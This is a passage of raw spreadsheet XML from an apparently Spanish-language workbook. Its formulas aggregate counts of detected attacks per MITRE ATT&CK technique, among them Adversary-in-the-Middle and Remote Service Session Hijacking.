        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B55,'Tabla 2 - Ataques detec (Imple)'!$O$3:$O$112)</f>
        <v>1</v>
      </c>
      <c r="R55" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B55,'Tabla 2 - Ataques detec (Imple)'!$N$3:$N$112)</f>
        <v>2</v>
      </c>
      <c r="S55" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B55,'Tabla 2 - Ataques detec (Imple)'!P$3:P$112)</f>
        <v>24</v>
      </c>
      <c r="T55" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B55,'Tabla 2 - Ataques detec (Imple)'!Q$3:Q$112)</f>
        <v>12</v>
      </c>
      <c r="U55" s="4" t="str">
        <f t="shared" si="2"/>
        <v>12 (24)</v>
      </c>
      <c r="V55" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B55,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>6</v>
      </c>
      <c r="W55" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B55,'Tabla 2 - Ataques detec (Imple)'!$T$3:$T$112)</f>
        <v>1</v>
      </c>
      <c r="X55" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B55,'Tabla 2 - Ataques detec (Imple)'!$S$3:$S$112)</f>
        <v>2</v>
      </c>
      <c r="Y55" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B55,'Tabla 2 - Ataques detec (Imple)'!U$3:U$112)</f>
        <v>23</v>
      </c>
      <c r="Z55" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B55,'Tabla 2 - Ataques detec (Imple)'!V$3:V$112)</f>
        <v>11</v>
      </c>
      <c r="AA55" s="322" t="str">
        <f t="shared" si="3"/>
        <v>11 (23)</v>
      </c>
      <c r="AB55" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B55,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>6</v>
      </c>
      <c r="AC55" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B55,'Tabla 2 - Ataques detec (Imple)'!$Y$3:$Y$112)</f>
        <v>1</v>
      </c>
      <c r="AD55" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B55,'Tabla 2 - Ataques detec (Imple)'!$X$3:$X$112)</f>
        <v>3</v>
      </c>
      <c r="AE55" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B55,'Tabla 2 - Ataques detec (Imple)'!Z$3:Z$112)</f>
        <v>16</v>
      </c>
      <c r="AF55" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B55,'Tabla 2 - Ataques detec (Imple)'!AA$3:AA$112)</f>
        <v>10</v>
      </c>
      <c r="AG55" s="322" t="str">
        <f t="shared" si="4"/>
        <v>10 (16)</v>
      </c>
      <c r="AH55" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B55,'Tabla 2 - Ataques detec (Imple)'!$AB$3:$AB$112)</f>
        <v>6</v>
      </c>
      <c r="AI55" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B55,'Tabla 2 - Ataques detec (Imple)'!$AD$3:$AD$112)</f>
        <v>1</v>
      </c>
      <c r="AJ55" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B55,'Tabla 2 - Ataques detec (Imple)'!$AC$3:$AC$112)</f>
        <v>2</v>
      </c>
      <c r="AK55" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B55,'Tabla 2 - Ataques detec (Imple)'!AE$3:AE$112)</f>
        <v>39</v>
      </c>
      <c r="AL55" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B55,'Tabla 2 - Ataques detec (Imple)'!AF$3:AF$112)</f>
        <v>21</v>
      </c>
      <c r="AM55" s="322" t="str">
        <f t="shared" si="5"/>
        <v>21 (39)</v>
      </c>
      <c r="AN55" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B55,'Tabla 2 - Ataques detec (Imple)'!$AG$3:$AG$112)</f>
        <v>12</v>
      </c>
      <c r="AO55" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B55,'Tabla 2 - Ataques detec (Imple)'!$AI$3:$AI$112)</f>
        <v>1</v>
      </c>
      <c r="AP55" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B55,'Tabla 2 - Ataques detec (Imple)'!$AH$3:$AH$112)</f>
        <v>3</v>
      </c>
      <c r="AQ55" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B55,'Tabla 2 - Ataques detec (Imple)'!AJ$3:AJ$112)</f>
        <v>0</v>
      </c>
      <c r="AR55" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B55,'Tabla 2 - Ataques detec (Imple)'!AK$3:AK$112)</f>
        <v>0</v>
      </c>
      <c r="AS55" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT55" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B55,'Tabla 2 - Ataques detec (Imple)'!$AL$3:$AL$112)</f>
        <v>0</v>
      </c>
      <c r="AU55" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B55,'Tabla 2 - Ataques detec (Imple)'!$AN$3:$AN$112)</f>
        <v>0</v>
      </c>
      <c r="AV55" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B55,'Tabla 2 - Ataques detec (Imple)'!$AM$3:$AM$112)</f>
        <v>0</v>
      </c>
      <c r="AW55" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B55,'Tabla 2 - Ataques detec (Imple)'!AO$3:AO$112)</f>
        <v>0</v>
      </c>
      <c r="AX55" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B55,'Tabla 2 - Ataques detec (Imple)'!AP$3:AP$112)</f>
        <v>0</v>
      </c>
      <c r="AY55" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ55" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B55,'Tabla 2 - Ataques detec (Imple)'!$AQ$3:$AQ$112)</f>
        <v>0</v>
      </c>
      <c r="BA55" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B55,'Tabla 2 - Ataques detec (Imple)'!$AS$3:$AS$112)</f>
        <v>0</v>
      </c>
      <c r="BB55" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B55,'Tabla 2 - Ataques detec (Imple)'!$AR$3:$AR$112)</f>
        <v>0</v>
      </c>
      <c r="BC55" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B55,'Tabla 2 - Ataques detec (Imple)'!AT$3:AT$112)</f>
        <v>24</v>
      </c>
      <c r="BD55" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B55,'Tabla 2 - Ataques detec (Imple)'!AU$3:AU$112)</f>
        <v>12</v>
      </c>
      <c r="BE55" s="4" t="str">
        <f t="shared" si="8"/>
        <v>12 (24)</v>
      </c>
      <c r="BF55" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B55,'Tabla 2 - Ataques detec (Imple)'!$AV$3:$AV$112)</f>
        <v>6</v>
      </c>
      <c r="BG55" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B55,'Tabla 2 - Ataques detec (Imple)'!$AX$3:$AX$112)</f>
        <v>1</v>
      </c>
      <c r="BH55" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B55,'Tabla 2 - Ataques detec (Imple)'!$AW$3:$AW$112)</f>
        <v>2</v>
      </c>
      <c r="BI55" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B55,'Tabla 2 - Ataques detec (Imple)'!AY$3:AY$112)</f>
        <v>5</v>
      </c>
      <c r="BJ55" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B55,'Tabla 2 - Ataques detec (Imple)'!AZ$3:AZ$112)</f>
        <v>3</v>
      </c>
      <c r="BK55" s="322" t="str">
        <f t="shared" si="9"/>
        <v>3 (5)</v>
      </c>
      <c r="BL55" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B55,'Tabla 2 - Ataques detec (Imple)'!BA$3:BA$112)</f>
        <v>2</v>
      </c>
      <c r="BM55" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B55,'Tabla 2 - Ataques detec (Imple)'!$BC$3:$BC$112)</f>
        <v>1</v>
      </c>
      <c r="BN55" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B55,'Tabla 2 - Ataques detec (Imple)'!$BB$3:$BB$112)</f>
        <v>2</v>
      </c>
      <c r="BO55" s="288">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B55,'Tabla 2 - Ataques detec (Imple)'!BD$3:BD$112)</f>
        <v>6</v>
      </c>
      <c r="BP55" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B55,'Tabla 2 - Ataques detec (Imple)'!BE$3:BE$112)</f>
        <v>4</v>
      </c>
      <c r="BQ55" s="4" t="str">
        <f t="shared" si="10"/>
        <v>4 (6)</v>
      </c>
      <c r="BR55" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B55,'Tabla 2 - Ataques detec (Imple)'!BF$3:BF$112)</f>
        <v>2</v>
      </c>
      <c r="BS55" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B55,'Tabla 2 - Ataques detec (Imple)'!BG$3:BG$112)</f>
        <v>1</v>
      </c>
      <c r="BT55" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B55,'Tabla 2 - Ataques detec (Imple)'!$BI$3:$BI$112)</f>
        <v>1</v>
      </c>
      <c r="BU55" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B55,'Tabla 2 - Ataques detec (Imple)'!$BH$3:$BH$112)</f>
        <v>3</v>
      </c>
      <c r="BV55" s="292">
        <v>0</v>
      </c>
      <c r="BW55" s="322">
        <v>0</v>
      </c>
      <c r="BX55" s="4" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY55" s="12">
        <v>0</v>
      </c>
      <c r="BZ55" s="13">
        <v>0</v>
      </c>
      <c r="CA55" s="394">
        <v>0</v>
      </c>
      <c r="CB55" s="288">
        <v>0</v>
      </c>
      <c r="CC55" s="4">
        <v>0</v>
      </c>
      <c r="CD55" s="4" t="str">
        <f t="shared" si="12"/>
        <v>0 (0)</v>
      </c>
      <c r="CE55" s="4">
        <v>0</v>
      </c>
      <c r="CF55" s="4">
        <v>0</v>
      </c>
      <c r="CG55" s="13">
        <v>0</v>
      </c>
      <c r="CH55" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="56" spans="1:86" ht="15" customHeight="1">
      <c r="A56" s="4">
        <f t="shared" si="13"/>
        <v>54</v>
      </c>
      <c r="B56" s="4" t="str">
        <f>IFERROR(VLOOKUP(A56,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1557</v>
      </c>
      <c r="C56" s="493" t="str">
        <f>IFERROR(VLOOKUP(B56,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Adversary-in-the-Middle</v>
      </c>
      <c r="D56" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B56)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E56" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B56,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>5</v>
      </c>
      <c r="F56" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (5)</v>
      </c>
      <c r="G56" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B56,'Tabla 2 - Ataques detec (Imple)'!F$3:F$112)</f>
        <v>0</v>
      </c>
      <c r="H56" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B56,'Tabla 2 - Ataques detec (Imple)'!G$3:G$112)</f>
        <v>0</v>
      </c>
      <c r="I56" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="J56" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B56,'Tabla 2 - Ataques detec (Imple)'!$H$3:$H$112)</f>
        <v>0</v>
      </c>
      <c r="K56" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B56,'Tabla 2 - Ataques detec (Imple)'!$J$3:$J$112)</f>
        <v>0</v>
      </c>
      <c r="L56" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B56,'Tabla 2 - Ataques detec (Imple)'!$I$3:$I$112)</f>
        <v>0</v>
      </c>
      <c r="M56" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B56,'Tabla 2 - Ataques detec (Imple)'!K$3:K$112)</f>
        <v>0</v>
      </c>
      <c r="N56" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B56,'Tabla 2 - Ataques detec (Imple)'!L$3:L$112)</f>
        <v>0</v>
      </c>
      <c r="O56" s="322" t="str">
        <f t="shared" si="1"/>
        <v>0 (0)</v>
      </c>
      <c r="P56" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B56,'Tabla 2 - Ataques detec (Imple)'!$M$3:$M$112)</f>
        <v>0</v>
      </c>
      <c r="Q56" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B56,'Tabla 2 - Ataques detec (Imple)'!$O$3:$O$112)</f>
        <v>0</v>
      </c>
      <c r="R56" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B56,'Tabla 2 - Ataques detec (Imple)'!$N$3:$N$112)</f>
        <v>0</v>
      </c>
      <c r="S56" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B56,'Tabla 2 - Ataques detec (Imple)'!P$3:P$112)</f>
        <v>0</v>
      </c>
      <c r="T56" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B56,'Tabla 2 - Ataques detec (Imple)'!Q$3:Q$112)</f>
        <v>0</v>
      </c>
      <c r="U56" s="4" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="V56" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B56,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>0</v>
      </c>
      <c r="W56" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B56,'Tabla 2 - Ataques detec (Imple)'!$T$3:$T$112)</f>
        <v>0</v>
      </c>
      <c r="X56" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B56,'Tabla 2 - Ataques detec (Imple)'!$S$3:$S$112)</f>
        <v>0</v>
      </c>
      <c r="Y56" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B56,'Tabla 2 - Ataques detec (Imple)'!U$3:U$112)</f>
        <v>2</v>
      </c>
      <c r="Z56" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B56,'Tabla 2 - Ataques detec (Imple)'!V$3:V$112)</f>
        <v>1</v>
      </c>
      <c r="AA56" s="322" t="str">
        <f t="shared" si="3"/>
        <v>1 (2)</v>
      </c>
      <c r="AB56" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B56,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>0</v>
      </c>
      <c r="AC56" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B56,'Tabla 2 - Ataques detec (Imple)'!$Y$3:$Y$112)</f>
        <v>1</v>
      </c>
      <c r="AD56" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B56,'Tabla 2 - Ataques detec (Imple)'!$X$3:$X$112)</f>
        <v>1</v>
      </c>
      <c r="AE56" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B56,'Tabla 2 - Ataques detec (Imple)'!Z$3:Z$112)</f>
        <v>70</v>
      </c>
      <c r="AF56" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B56,'Tabla 2 - Ataques detec (Imple)'!AA$3:AA$112)</f>
        <v>3</v>
      </c>
      <c r="AG56" s="322" t="str">
        <f t="shared" si="4"/>
        <v>3 (70)</v>
      </c>
      <c r="AH56" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B56,'Tabla 2 - Ataques detec (Imple)'!$AB$3:$AB$112)</f>
        <v>3</v>
      </c>
      <c r="AI56" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B56,'Tabla 2 - Ataques detec (Imple)'!$AD$3:$AD$112)</f>
        <v>1</v>
      </c>
      <c r="AJ56" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B56,'Tabla 2 - Ataques detec (Imple)'!$AC$3:$AC$112)</f>
        <v>2</v>
      </c>
      <c r="AK56" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B56,'Tabla 2 - Ataques detec (Imple)'!AE$3:AE$112)</f>
        <v>72</v>
      </c>
      <c r="AL56" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B56,'Tabla 2 - Ataques detec (Imple)'!AF$3:AF$112)</f>
        <v>4</v>
      </c>
      <c r="AM56" s="322" t="str">
        <f t="shared" si="5"/>
        <v>4 (72)</v>
      </c>
      <c r="AN56" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B56,'Tabla 2 - Ataques detec (Imple)'!$AG$3:$AG$112)</f>
        <v>4</v>
      </c>
      <c r="AO56" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B56,'Tabla 2 - Ataques detec (Imple)'!$AI$3:$AI$112)</f>
        <v>1</v>
      </c>
      <c r="AP56" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B56,'Tabla 2 - Ataques detec (Imple)'!$AH$3:$AH$112)</f>
        <v>2</v>
      </c>
      <c r="AQ56" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B56,'Tabla 2 - Ataques detec (Imple)'!AJ$3:AJ$112)</f>
        <v>0</v>
      </c>
      <c r="AR56" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B56,'Tabla 2 - Ataques detec (Imple)'!AK$3:AK$112)</f>
        <v>0</v>
      </c>
      <c r="AS56" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT56" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B56,'Tabla 2 - Ataques detec (Imple)'!$AL$3:$AL$112)</f>
        <v>0</v>
      </c>
      <c r="AU56" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B56,'Tabla 2 - Ataques detec (Imple)'!$AN$3:$AN$112)</f>
        <v>0</v>
      </c>
      <c r="AV56" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B56,'Tabla 2 - Ataques detec (Imple)'!$AM$3:$AM$112)</f>
        <v>0</v>
      </c>
      <c r="AW56" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B56,'Tabla 2 - Ataques detec (Imple)'!AO$3:AO$112)</f>
        <v>0</v>
      </c>
      <c r="AX56" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B56,'Tabla 2 - Ataques detec (Imple)'!AP$3:AP$112)</f>
        <v>0</v>
      </c>
      <c r="AY56" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ56" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B56,'Tabla 2 - Ataques detec (Imple)'!$AQ$3:$AQ$112)</f>
        <v>0</v>
      </c>
      <c r="BA56" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B56,'Tabla 2 - Ataques detec (Imple)'!$AS$3:$AS$112)</f>
        <v>0</v>
      </c>
      <c r="BB56" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B56,'Tabla 2 - Ataques detec (Imple)'!$AR$3:$AR$112)</f>
        <v>0</v>
      </c>
      <c r="BC56" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B56,'Tabla 2 - Ataques detec (Imple)'!AT$3:AT$112)</f>
        <v>0</v>
      </c>
      <c r="BD56" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B56,'Tabla 2 - Ataques detec (Imple)'!AU$3:AU$112)</f>
        <v>0</v>
      </c>
      <c r="BE56" s="4" t="str">
        <f t="shared" si="8"/>
        <v>0 (0)</v>
      </c>
      <c r="BF56" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B56,'Tabla 2 - Ataques detec (Imple)'!$AV$3:$AV$112)</f>
        <v>0</v>
      </c>
      <c r="BG56" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B56,'Tabla 2 - Ataques detec (Imple)'!$AX$3:$AX$112)</f>
        <v>0</v>
      </c>
      <c r="BH56" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B56,'Tabla 2 - Ataques detec (Imple)'!$AW$3:$AW$112)</f>
        <v>0</v>
      </c>
      <c r="BI56" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B56,'Tabla 2 - Ataques detec (Imple)'!AY$3:AY$112)</f>
        <v>0</v>
      </c>
      <c r="BJ56" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B56,'Tabla 2 - Ataques detec (Imple)'!AZ$3:AZ$112)</f>
        <v>0</v>
      </c>
      <c r="BK56" s="322" t="str">
        <f t="shared" si="9"/>
        <v>0 (0)</v>
      </c>
      <c r="BL56" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B56,'Tabla 2 - Ataques detec (Imple)'!BA$3:BA$112)</f>
        <v>0</v>
      </c>
      <c r="BM56" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B56,'Tabla 2 - Ataques detec (Imple)'!$BC$3:$BC$112)</f>
        <v>0</v>
      </c>
      <c r="BN56" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B56,'Tabla 2 - Ataques detec (Imple)'!$BB$3:$BB$112)</f>
        <v>0</v>
      </c>
      <c r="BO56" s="288">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B56,'Tabla 2 - Ataques detec (Imple)'!BD$3:BD$112)</f>
        <v>6</v>
      </c>
      <c r="BP56" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B56,'Tabla 2 - Ataques detec (Imple)'!BE$3:BE$112)</f>
        <v>6</v>
      </c>
      <c r="BQ56" s="4" t="str">
        <f t="shared" si="10"/>
        <v>6 (6)</v>
      </c>
      <c r="BR56" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B56,'Tabla 2 - Ataques detec (Imple)'!BF$3:BF$112)</f>
        <v>0</v>
      </c>
      <c r="BS56" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B56,'Tabla 2 - Ataques detec (Imple)'!BG$3:BG$112)</f>
        <v>4</v>
      </c>
      <c r="BT56" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B56,'Tabla 2 - Ataques detec (Imple)'!$BI$3:$BI$112)</f>
        <v>1</v>
      </c>
      <c r="BU56" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B56,'Tabla 2 - Ataques detec (Imple)'!$BH$3:$BH$112)</f>
        <v>5</v>
      </c>
      <c r="BV56" s="292">
        <v>0</v>
      </c>
      <c r="BW56" s="322">
        <v>0</v>
      </c>
      <c r="BX56" s="4" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY56" s="12">
        <v>0</v>
      </c>
      <c r="BZ56" s="13">
        <v>0</v>
      </c>
      <c r="CA56" s="394">
        <v>0</v>
      </c>
      <c r="CB56" s="288">
        <v>0</v>
      </c>
      <c r="CC56" s="4">
        <v>0</v>
      </c>
      <c r="CD56" s="4" t="str">
        <f t="shared" si="12"/>
        <v>0 (0)</v>
      </c>
      <c r="CE56" s="4">
        <v>0</v>
      </c>
      <c r="CF56" s="4">
        <v>0</v>
      </c>
      <c r="CG56" s="13">
        <v>0</v>
      </c>
      <c r="CH56" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="57" spans="1:86" ht="15" customHeight="1">
      <c r="A57" s="4">
        <f t="shared" si="13"/>
        <v>55</v>
      </c>
      <c r="B57" s="4" t="str">
        <f>IFERROR(VLOOKUP(A57,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1563</v>
      </c>
      <c r="C57" s="493" t="str">
        <f>IFERROR(VLOOKUP(B57,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Remote Service Session Hijacking</v>
      </c>
      <c r="D57" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B57)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E57" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B57,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>97</v>
      </c>
      <c r="F57" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (97)</v>
      </c>
      <c r="G57" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B57,'Tabla 2 - Ataques detec (Imple)'!F$3:F$112)</f>
        <v>199</v>
      </c>
      <c r="H57" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B57,'Tabla 2 - Ataques detec (Imple)'!G$3:G$112)</f>
        <v>43</v>
      </c>
      <c r="I57" s="322" t="str">
        <f t="shared" si="0"/>
        <v>43 (199)</v>
      </c>
      <c r="J57" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B57,'Tabla 2 - Ataques detec (Imple)'!$H$3:$H$112)</f>
        <v>3</v>
      </c>
      <c r="K57" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B57,'Tabla 2 - Ataques detec (Imple)'!$J$3:$J$112)</f>
        <v>1</v>
      </c>
      <c r="L57" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B57,'Tabla 2 - Ataques detec (Imple)'!$I$3:$I$112)</f>
        <v>27</v>
      </c>
      <c r="M57" s="322">
